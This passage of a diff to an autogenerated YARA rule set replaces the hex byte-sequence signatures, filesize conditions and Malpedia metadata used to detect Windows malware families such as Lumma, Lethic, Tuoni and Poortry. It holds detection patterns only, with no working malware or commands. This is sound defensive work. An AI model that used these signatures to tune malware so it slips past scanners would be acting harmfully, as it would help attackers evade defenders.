+rule MALPEDIA_Win_Lethic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2292bd3e-30fc-5fd2-b5f2-54da12682502"
+		id = "3babd57d-d49b-5fd8-b851-cfcf000e34be"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.conficker_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lethic_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "516f879a278afd371cf4391eda00f14d5a379f5084ac579457d7a12528cabf86"
+		logic_hash = "b68d77c1a72e1fca1c5c9d72302fcacf09ed698f69d0c7903522cd1a657700c5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119478,34 +119512,34 @@ rule MALPEDIA_Win_Conficker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81f9a9fe0000 743b 8bce 81e1fffe0000 81f9c6120000 }
-		$sequence_1 = { 0fb6d3 8b5c9008 46 3b7510 891f 894c9008 }
-		$sequence_2 = { f2ae 61 7502 4a 4a 3c09 }
-		$sequence_3 = { ff15???????? 8945e4 8365fc00 85c0 7420 68???????? }
-		$sequence_4 = { 85c0 750a 2145fc c745f8b0ae6243 ff15???????? 3345f8 }
-		$sequence_5 = { 743b 8bce 81e1fffe0000 81f9c6120000 }
-		$sequence_6 = { 894d08 8b0e 894c9808 02ca 8916 8b750c }
-		$sequence_7 = { 8955fc bfffffff7f 23d7 8945f0 8955f4 }
-		$sequence_8 = { 395df8 7507 c745fc01000000 57 }
-		$sequence_9 = { 81e1fffe0000 81f9c6120000 742b 8bce }
+		$sequence_0 = { 8b550c 8955f8 8b45f8 034510 8945f4 }
+		$sequence_1 = { c7823410000001000000 6a10 8b450c 50 8b4dfc 83c108 51 }
+		$sequence_2 = { 8945fc 8b4dfc 894df0 8b550c }
+		$sequence_3 = { ffd1 33c0 eb42 6a10 }
+		$sequence_4 = { 8b08 890a 8b55fc 8b02 8945fc 8b4df4 51 }
+		$sequence_5 = { 8b55fc 83c208 52 8b45fc 8b4818 51 }
+		$sequence_6 = { 33c0 e9???????? 8b45fc 8b4d10 894804 8b55fc c7823410000001000000 }
+		$sequence_7 = { 890a 8b55fc 8b02 8945fc 8b4df4 51 8b55f8 }
+		$sequence_8 = { 894df8 8b55fc 3b55f8 7411 8b45fc c60000 }
+		$sequence_9 = { 8b55fc c7823410000001000000 6a10 8b450c 50 8b4dfc 83c108 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Paladin_Auto : FILE
+rule MALPEDIA_Win_Lumma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea744185-35d7-56b0-b303-642060848578"
+		id = "18aafe26-24fd-5a9a-bbc9-ae4c88d965fc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.paladin_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lumma_auto.yar#L1-L194"
 		license_url = "N/A"
-		logic_hash = "666d7127e3e5da62ea89e9776cb09bdea95055b6e6b5094287262ef9a36c1b71"
+		logic_hash = "5ba9e6acd0a483b46312a1312db0d7f170a01587be01ff146763c3e3b48ae6c9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -119517,32 +119551,43 @@ rule MALPEDIA_Win_Paladin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5d00 3bdd 7447 8d4c2414 6a00 8bc3 8b1b }
-		$sequence_1 = { 03fd ff15???????? 8b4620 85c0 7e44 33c9 8a4e1c }
-		$sequence_2 = { 40 3bc6 7cf2 6a00 }
-		$sequence_3 = { 894664 8b465c 6a00 57 8b3d???????? 6a00 }
-		$sequence_4 = { 7c02 8bc1 57 8bce 894638 e8???????? }
-		$sequence_5 = { c1e004 03c2 33d2 8a11 8d04c0 8d0443 }
-		$sequence_6 = { e8???????? 8d442418 6a04 50 8bcb e8???????? 8d4c2424 }
-		$sequence_7 = { 6a00 6880000000 6a03 6a00 6a01 8d451c 6800000080 }
-		$sequence_8 = { 56 ff95a4feffff 85c0 7412 6820030000 }
-		$sequence_9 = { 8d69f3 55 e8???????? 8bf0 55 }
+		$sequence_0 = { 53 ff767c ff7678 ff7644 }
+		$sequence_1 = { ffd0 83c40c 894648 85c0 }
+		$sequence_2 = { 894604 8b461c c1e002 50 }
+		$sequence_3 = { ff7678 ff7644 ff563c 83c414 }
+		$sequence_4 = { 833800 740a e8???????? 833822 }
+		$sequence_5 = { 66894316 0fb7560e 0fb74e0c e8???????? }
+		$sequence_6 = { 66894338 8b4626 89433c 8b462a }
+		$sequence_7 = { 8b4610 894320 8b4614 894328 }
+		$sequence_8 = { e8???????? 83c40c 6a02 6804010000 e8???????? }
+		$sequence_9 = { 017e78 83567c00 017e68 83566c00 }
+		$sequence_10 = { 83f900 75f1 83ec04 8b4508 e8???????? 89ec 5d }
+		$sequence_11 = { 31c0 837e3808 0f94c0 294628 }
+		$sequence_12 = { 0f94c3 89d5 09cd 0f95c7 }
+		$sequence_13 = { 0f95c7 30df 7514 837e6c00 }
+		$sequence_14 = { 8b5204 45 8b4208 45 8b4a0c 49 83fe04 }
+		$sequence_15 = { 01e8 56 ff742424 50 }
+		$sequence_16 = { 50 57 ff7618 e8???????? 83c40c 894618 }
+		$sequence_17 = { 01c9 39dd ba00000000 19c2 72f1 }
+		$sequence_18 = { 234608 7418 8b8684000000 29f8 }
+		$sequence_19 = { 31ed 89ae88000000 c7868c00000000000000 899e80000000 833e00 }
+		$sequence_20 = { 8b550c 6bd204 89d1 83e904 8b5510 8b1c0a }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 1115136
 }
-rule MALPEDIA_Win_Odinaff_Auto : FILE
+rule MALPEDIA_Win_Tuoni_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d0d529bd-8ddc-568c-bb57-34ccb7211d4b"
+		id = "d6fe1657-0ba1-5787-bb02-c66c2de38004"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.odinaff_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tuoni"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tuoni_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a33fd98331eb6936af0c82dded866dcdbe45b48b5675a4678e1caee59c4bd151"
+		logic_hash = "1e49c2155d5f2354628f8bc71b59233071caabc76e3825284e0656eaaabf9b91"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119556,32 +119601,32 @@ rule MALPEDIA_Win_Odinaff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 c745983c000000 c745ac00010000 8955c4 c745c800080000 }
-		$sequence_1 = { f7de 85c0 7408 50 }
-		$sequence_2 = { 83c410 f7d8 1bf6 8b45e8 f7de 85c0 }
-		$sequence_3 = { 6a00 51 52 50 ff15???????? 8945e8 }
-		$sequence_4 = { c745fc00010000 ff15???????? 50 ff15???????? 8bf8 8d45fc 50 }
-		$sequence_5 = { b8???????? e8???????? 8b1d???????? 83c410 f7d8 1bf6 8b45e8 }
-		$sequence_6 = { 53 56 57 8b3d???????? 6800001000 }
-		$sequence_7 = { 68???????? 68???????? 53 8bf0 ff15???????? 83c40c }
-		$sequence_8 = { 6a00 6a00 51 ff15???????? 8b45fc 85c0 }
-		$sequence_9 = { ffd3 8b3d???????? 50 ffd7 6808020000 }
+		$sequence_0 = { 84c0 7427 3c07 7423 8b4108 c6401c01 c7401816000000 }
+		$sequence_1 = { 894604 e8???????? 894604 8bc6 59 e8???????? c20400 }
+		$sequence_2 = { e8???????? b8???????? e9???????? 8d4dd8 e9???????? 8b45d0 83e001 }
+		$sequence_3 = { e8???????? 8d8daffbffff c645fc0a 51 8b08 e8???????? 8b8db4fbffff }
+		$sequence_4 = { 7429 6a08 59 33c0 83ec18 8bfe f3ab }
+		$sequence_5 = { 894c2414 8d0c28 89442420 8974241c 894c2418 55 7630 }
+		$sequence_6 = { e8???????? 83c40c 6b45e430 8945dc 8d80602a4500 8945e4 803800 }
+		$sequence_7 = { 85c0 7422 ff75e0 e8???????? ff75e4 e8???????? 53 }
+		$sequence_8 = { 0f848a030000 51 51 8bcc 8d45d8 50 8919 }
+		$sequence_9 = { e8???????? 83c40c 8d85a8fbffff 6a08 50 ff15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 734208
 }
-rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE
+rule MALPEDIA_Win_Phandoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "363fee5b-028a-51bb-ae8e-5e88e615a60a"
+		id = "155e4267-136b-55b4-90bd-1c218e8670a7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_yahoo_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.phandoor_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "cbf24b20d63128f54b5e31c01d6a0853cc228489290e6c3462d1dc4838163313"
+		logic_hash = "527334a4bd04f39c9bfefa050c6438c0d4a556c8a31f02edf88789f46c6d4efd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119595,32 +119640,38 @@ rule MALPEDIA_Win_Webc2_Yahoo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d443802 50 e8???????? 56 e8???????? ff750c }
-		$sequence_1 = { ffb69c841e00 ff15???????? 85c0 7506 53 }
-		$sequence_2 = { e8???????? 015d0c 03f3 83c428 }
-		$sequence_3 = { ffb694841e00 ffd3 57 e8???????? 59 }
-		$sequence_4 = { 83ec64 8b4d08 56 57 68???????? 6a01 }
-		$sequence_5 = { e8???????? 6a04 68???????? ff750c ff15???????? }
-		$sequence_6 = { 85c0 0f84b4000000 8d85fcfeffff 56 50 8d85fcfeffff }
-		$sequence_7 = { 8d85c8fdffff 56 50 e8???????? 83c418 }
-		$sequence_8 = { 8b7518 83c414 8d85fcd7ffff 8bcb }
-		$sequence_9 = { b838280000 e8???????? 53 56 }
+		$sequence_0 = { 8b36 e8???????? 83c404 eb25 e8???????? }
+		$sequence_1 = { ffd6 833d????????00 a3???????? 0f8482000000 833d????????00 7479 833d????????00 }
+		$sequence_2 = { 83c418 803f53 755f 807f015e }
+		$sequence_3 = { 8bd8 c1eb08 8bd1 895df8 8bd9 c1ea08 }
+		$sequence_4 = { 22da 22d9 8bc8 c1e910 224df8 }
+		$sequence_5 = { 890d???????? 8b96bc010000 8915???????? 33ff 399e90010000 763b }
+		$sequence_6 = { e8???????? 8b1d???????? 50 ffd3 8bf8 3bfe 8b35???????? }
+		$sequence_7 = { 0f8438010000 833d????????00 0f842b010000 833d????????00 0f841e010000 833d????????00 0f8411010000 }
+		$sequence_8 = { 741c 8b0d???????? 68???????? 51 c705????????04000000 }
+		$sequence_9 = { 83c404 8bf7 85ff 75e6 5f c7430800000000 }
+		$sequence_10 = { 43 84c0 7409 8803 }
+		$sequence_11 = { 6a03 d1ea 8d85e8efffff e8???????? }
+		$sequence_12 = { 741c 56 8b35???????? 3acb 740e }
+		$sequence_13 = { 3acb 740e 50 ffd6 }
+		$sequence_14 = { 6a03 d1ea 8bc3 e8???????? 8bc8 85c9 }
+		$sequence_15 = { 57 68???????? 50 c705????????03000000 ffd6 8b0d???????? 33ff }
 
 	condition:
-		7 of them and filesize < 8060928
+		7 of them and filesize < 2124800
 }
-rule MALPEDIA_Win_Unidentified_001_Auto : FILE
+rule MALPEDIA_Win_Wininetloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f3b6be6e-c236-5d2d-a19b-afb6b895b93e"
+		id = "362a277f-08db-55d6-afc8-115b8717311e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_001_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wininetloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wininetloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "499ec49f978d7f898a74204c78a47d7ff968e3be0856c4a113e03a1aece4ce50"
+		logic_hash = "8b4c276c165b1cb748209b41360afa408d3bb0ddb28615bc03dcc23e6420b5ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119634,32 +119685,32 @@ rule MALPEDIA_Win_Unidentified_001_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 741c 83e80a 0f84c6fcffff 2def000000 }
-		$sequence_1 = { 6830750000 ffd6 8b4df8 85c9 7483 8d45fc }
-		$sequence_2 = { 85c9 0f84dafdffff e8???????? 85c0 0f85f3000000 }
-		$sequence_3 = { 8b06 8d4dfc 51 56 ff5028 85c0 7d0c }
-		$sequence_4 = { 895824 895808 c7401c06000000 47 }
-		$sequence_5 = { 2d0a020000 0f84a2faffff 2d02020000 e9???????? c705????????0d000000 }
-		$sequence_6 = { 8b4508 83e103 f3a4 8bd0 668b08 }
-		$sequence_7 = { 0f8468feffff 3d4b475a00 0f845dfeffff 3d4d4f5a00 0f8507f9ffff 8325????????00 e9???????? }
-		$sequence_8 = { 2df9070000 0f8437010000 2d01010000 0f84e2050000 2df3010000 7420 }
-		$sequence_9 = { 3d54484100 7416 3d414c4100 753b c705????????09000000 e9???????? }
+		$sequence_0 = { 66490f7ed9 4c8d050cb70500 ba28000000 488d4ddf e8???????? 4863d8 498b4540 }
+		$sequence_1 = { c3 488b0d???????? ba51230000 ff15???????? 488b0d???????? ba53230000 4889442430 }
+		$sequence_2 = { 5b c3 803d????????00 0f8459ffffff 498bd1 488bcb 4883c430 }
+		$sequence_3 = { 458d4118 488bce ff15???????? 8b442430 4038bc24e0000000 0f45442434 4c63c0 }
+		$sequence_4 = { 48891d???????? 48c705????????0f000000 881d???????? 448d431b 488d15d9be0f00 488d0d522e1200 e8???????? }
+		$sequence_5 = { eb02 b301 4883fa10 722d 48ffc2 488bc1 4881fa00100000 }
+		$sequence_6 = { c6430600 eb21 48c744242006000000 4c8d0dc3d10b00 4533c0 418d5006 488d4c2430 }
+		$sequence_7 = { 803a5c 752a 4c8d4201 4c3bc0 7421 f6c108 750a }
+		$sequence_8 = { e9???????? 488d8aa8000000 4883c108 e9???????? 488d8aa8000000 e9???????? 4055 }
+		$sequence_9 = { 5e 5d c3 ba5e230000 488b4e18 ff15???????? 488bc8 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 2659328
 }
-rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE
+rule MALPEDIA_Win_Billgates_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a191507-05f1-515e-ae93-69990858de4e"
+		id = "936ce7c3-e0bc-5e8a-a94c-d204107ad6c9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_ugx_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.billgates_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "da5aed5a4142e6d6386e692fafe9cfc551187544798ccc57d23b8cb2bec2ee67"
+		logic_hash = "0d1344c595e66a8a3fe952afc687de569fadd20ac0c050f652fba5100e4b414d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119673,32 +119724,32 @@ rule MALPEDIA_Win_Webc2_Ugx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff969c060000 3bc3 89458c 0f8497030000 }
-		$sequence_1 = { 57 ff969c060000 3bc3 8945d8 0f8487020000 }
-		$sequence_2 = { 50 ff7508 ff969c060000 3bc3 8945bc 0f84a2040000 8b7db4 }
-		$sequence_3 = { ff55c0 57 ff55f8 ff55e8 }
-		$sequence_4 = { 50 e8???????? 6a01 6a10 57 68420d0000 }
-		$sequence_5 = { aa 33c0 8d7d9d 885d9c c645d47a ab ab }
-		$sequence_6 = { 50 ff15???????? 85c0 7455 8d85a8feffff }
-		$sequence_7 = { 8d86a4080000 50 57 ff969c060000 3bc3 894594 0f84a7020000 }
-		$sequence_8 = { f3ab 66ab aa 33c0 8d7de9 885de8 8b7508 }
-		$sequence_9 = { e9???????? 8d86ae090000 50 57 ff969c060000 3bc3 8945c0 }
+		$sequence_0 = { 7408 3c22 7404 3c30 7504 }
+		$sequence_1 = { 3c21 7408 3c23 7404 3c24 }
+		$sequence_2 = { 7404 3c58 7507 b802000000 eb02 }
+		$sequence_3 = { 740c 3c11 7408 3c22 7404 3c30 7504 }
+		$sequence_4 = { 3c11 7408 3c22 7404 3c30 7504 }
+		$sequence_5 = { 3c21 7408 3c23 7404 }
+		$sequence_6 = { ff15???????? 83f8ff 7508 ff15???????? f7d8 85c0 }
+		$sequence_7 = { 3c10 740c 3c11 7408 3c22 7404 3c30 }
+		$sequence_8 = { 740c 3c11 7408 3c22 7404 }
+		$sequence_9 = { 3c10 740c 3c11 7408 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 801792
 }
-rule MALPEDIA_Win_Yoddos_Auto : FILE
+rule MALPEDIA_Win_Xbtl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10bd6a04-5d32-593e-bba9-9dd8c0a017eb"
+		id = "5435db05-6232-5daa-a834-a076fea3e65f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yoddos_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xbtl_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "2bcf30b4ceb2923df5d8477756a290466d01852078cc1f43ff184eee0a076cc3"
+		logic_hash = "9ca9bf365c91027033dee3986f32faacddaba9038a823c9929d03b22f8c79417"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119712,32 +119763,32 @@ rule MALPEDIA_Win_Yoddos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 034508 57 53 894508 8d85d0feffff 50 }
-		$sequence_1 = { e8???????? 59 59 50 ff75bc ff75b8 e8???????? }
-		$sequence_2 = { 83c44c 8d85bcf6ffff 50 8d85bcfaffff }
-		$sequence_3 = { c68530ffffff77 c68531ffffff77 c68532ffffff77 c68533ffffff2e }
-		$sequence_4 = { c645e374 c645e465 c645e546 c645e669 }
-		$sequence_5 = { 50 e8???????? 8d85c8feffff 50 e8???????? 83c410 }
-		$sequence_6 = { c645db54 c645dc45 c645dd4d c645de5c c645df43 c645e075 c645e172 }
-		$sequence_7 = { c645fa74 c645fb6c 885dfc c645e857 c645e953 c645ea32 c645eb5f }
-		$sequence_8 = { ffd7 8d8d58ffffff 8945fc 51 50 c68558ffffff49 c68559ffffff6e }
-		$sequence_9 = { 7e06 897db4 8945ac 8d8548feffff 50 }
+		$sequence_0 = { 8945f8 03c0 03c0 50 52 8945fc e8???????? }
+		$sequence_1 = { 8a08 40 84c9 75f9 2bc6 8dbc05f4fdffff 89bde0fcffff }
+		$sequence_2 = { ff15???????? 8b07 8b4820 51 68???????? 8d542428 6a40 }
+		$sequence_3 = { 8b55e0 8b470c 8b4490f8 8945e0 85c0 742f 0fbf4304 }
+		$sequence_4 = { 81e200ff0000 33ca 8bd7 c1ea18 }
+		$sequence_5 = { 40 8945fc 3b4608 0f8c78ffffff eb09 8b55fc 8b7508 }
+		$sequence_6 = { 897004 8b5108 8bf2 c1ce08 81e600ff00ff }
+		$sequence_7 = { 8b8d8cfdffff 8b9598fdffff 50 8b8588fdffff 50 8b8590fdffff 57 }
+		$sequence_8 = { 8b07 68a00f0000 8d4c2448 51 89742448 }
+		$sequence_9 = { 8b530c 0fbfc8 837c8afc00 74e5 8b4308 3daa55ff7f }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Klrd_Auto : FILE
+rule MALPEDIA_Win_Neconyd_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2ac53cd-82a8-55ea-badd-f6f1aae58f93"
+		id = "0a26010e-37e7-5246-804a-229e327c846f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.klrd_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neconyd"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neconyd_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "0fc6f030ea4bb49d87359f96c6eceeeaeffbdd94bdee42030f76f2d7ec66a19a"
+		logic_hash = "a947c838b71e86e1d4014575969fcaf0468066058b0d2c62ee2db801fb092cd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119751,32 +119802,32 @@ rule MALPEDIA_Win_Klrd_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85fcefffff 50 e8???????? 59 50 }
-		$sequence_1 = { 8d85fcefffff 50 57 ff15???????? 57 ff15???????? }
-		$sequence_2 = { e8???????? 59 50 8d85fcefffff 50 57 }
-		$sequence_3 = { 3c00 0f8485020000 3c03 0f847d020000 3c09 0f8475020000 3c08 }
-		$sequence_4 = { c685c0fdffff00 68ff000000 6a00 8d85c1fdffff 50 e8???????? 83c40c }
-		$sequence_5 = { 59 59 ff7510 ff750c ff7508 ff35???????? ff15???????? }
-		$sequence_6 = { ebcc 8a85e7feffff 8885acfcffff 80bdacfcffff08 742f }
-		$sequence_7 = { 56 56 6a04 56 56 68000000c0 68???????? }
-		$sequence_8 = { 59 8d7dec f3a5 8b45ec 25ff000000 8885e7feffff 3c00 }
-		$sequence_9 = { ffb5b0fcffff ff15???????? 8985c8feffff 83bdc8feffff00 7515 ff15???????? }
+		$sequence_0 = { 74c7 ff75fc 8d85f0efffff 50 8d0437 50 }
+		$sequence_1 = { c6466701 c6466804 89460c 894e60 397d18 0f85b0000000 8b15???????? }
+		$sequence_2 = { c6466500 c6466b00 c6466c00 8b442418 898680000000 33c0 }
+		$sequence_3 = { c3 56 66c7003000 57 40 40 }
+		$sequence_4 = { 8365fc00 8d45fc 50 6a27 6a5e 8d45d4 }
+		$sequence_5 = { 57 bb???????? 50 8bd3 e8???????? b9???????? }
+		$sequence_6 = { 66c745ae5814 66c745b0d104 66c745b2c19d 66c745b42070 66c745b66afc 66c745b88fed }
+		$sequence_7 = { eb06 81c1ffff0000 880e 46 ff45fc }
+		$sequence_8 = { 29450c 83c40c 03f0 8d45fc 50 6800100000 8d85f0efffff }
+		$sequence_9 = { 394d18 0f8d35010000 8b0d???????? 3bcf 750c 66c745d83000 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 326182
 }
-rule MALPEDIA_Win_Megacortex_Auto : FILE
+rule MALPEDIA_Win_Gspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "208deefe-8484-5fed-92e0-3f970a206260"
+		id = "cfcf9b9b-4569-5d0f-801d-7a4c03469882"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.megacortex_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gspy_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "8fabc9945f7f432c61dd2181155b450bb3827a4277be45dd2f60b6e5a7f065dc"
+		logic_hash = "5f09532c5cfce71a555d1d7b8c6eb07037f464516d07c67472b924dd34736987"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119790,32 +119841,32 @@ rule MALPEDIA_Win_Megacortex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f843e040000 53 ff75e4 e8???????? 83c408 8945e0 85c0 }
-		$sequence_1 = { ff75c8 50 e8???????? 83c40c eb03 8b45c8 8b75b8 }
-		$sequence_2 = { f7db 1bdb 23d8 8b4304 83c304 2bde 8d50ff }
-		$sequence_3 = { 83c408 8d75fc 8b10 8d4aff f7d9 1bc9 }
-		$sequence_4 = { c3 8bc7 c745f801000000 8d4dec c745fc01000000 2bc1 8d7304 }
-		$sequence_5 = { f7da 1bd2 23d1 03d0 8d4d0c 2bf1 8d42ff }
-		$sequence_6 = { f6430401 c645ff01 7506 8b45e4 894308 807dff00 0f8422030000 }
-		$sequence_7 = { eb3a 83fb0b 7507 68???????? eb2e 83fb30 7507 }
-		$sequence_8 = { 8d45d0 50 e8???????? 8d75e8 8b10 8d4aff f7d9 }
-		$sequence_9 = { e8???????? 8d45b8 50 8d4e30 e8???????? 8b45d0 8d4d80 }
+		$sequence_0 = { 51 8d54241b 52 e8???????? 8944242c 8a442413 8b5c242c }
+		$sequence_1 = { 83c01c 50 55 56 ff15???????? 85c0 740a }
+		$sequence_2 = { 8a442412 3cff 7567 8b4d04 66c744241c3f2a c744241ec0744200 33c0 }
+		$sequence_3 = { c20400 8b0d???????? 56 33c0 57 8b3d???????? 3bcd }
+		$sequence_4 = { 85c0 757a 8b442414 8b08 8d542420 52 50 }
+		$sequence_5 = { 51 ff15???????? 85ff 7409 8d442418 e8???????? 83c304 }
+		$sequence_6 = { 8bf0 89742410 85f6 7449 33c0 897c2414 }
+		$sequence_7 = { 57 8bf8 32c0 88442407 85ff 0f8456010000 53 }
+		$sequence_8 = { 8b4124 ffd0 85c0 0f8464ffffff 8b442410 8b08 8b5108 }
+		$sequence_9 = { 7408 3c09 7c0e 3c0d 7f0a 83fa02 }
 
 	condition:
-		7 of them and filesize < 1556480
+		7 of them and filesize < 421888
 }
-rule MALPEDIA_Win_Vhd_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Poortry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a8c66bf-eb2b-583f-b44b-433c73c780b6"
+		id = "1496d84e-656c-5933-9472-ddcca15979df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vhd_ransomware_auto.yar#L1-L132"
